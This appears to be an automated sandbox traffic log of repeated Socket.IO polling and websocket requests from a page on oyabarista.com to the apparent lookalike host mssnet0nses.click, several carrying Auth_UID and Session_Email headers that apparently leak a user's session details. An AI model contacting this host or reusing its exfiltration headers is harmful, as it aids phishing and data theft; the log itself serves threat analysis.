            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNreWw HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ZSPtxHVB7Jb3tq1ajYhNUQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNreWw HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrelO&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrelM&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrelO&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrfLw HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=F0YwhNqusdKEacySAAfI HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: JXZ1SmqkVejfaQvm9RzfwA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrfLw HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfI HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfI HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfI HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrg8S HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ruzgv2+4Gy1MQ6jhsQClRQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrg8S HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrgxy HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrgxy HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: YyMTPNb80g+ImvIjL2M6NQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrhrx HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrhrx HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: IkGXZRifcEzix83902Kzjw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrikj HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrikj HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: i7MMuKhMTQdx28PFiT3Pxw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrjeo HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrjeo HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: lbadGqHx4TXj+c3PC772EA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
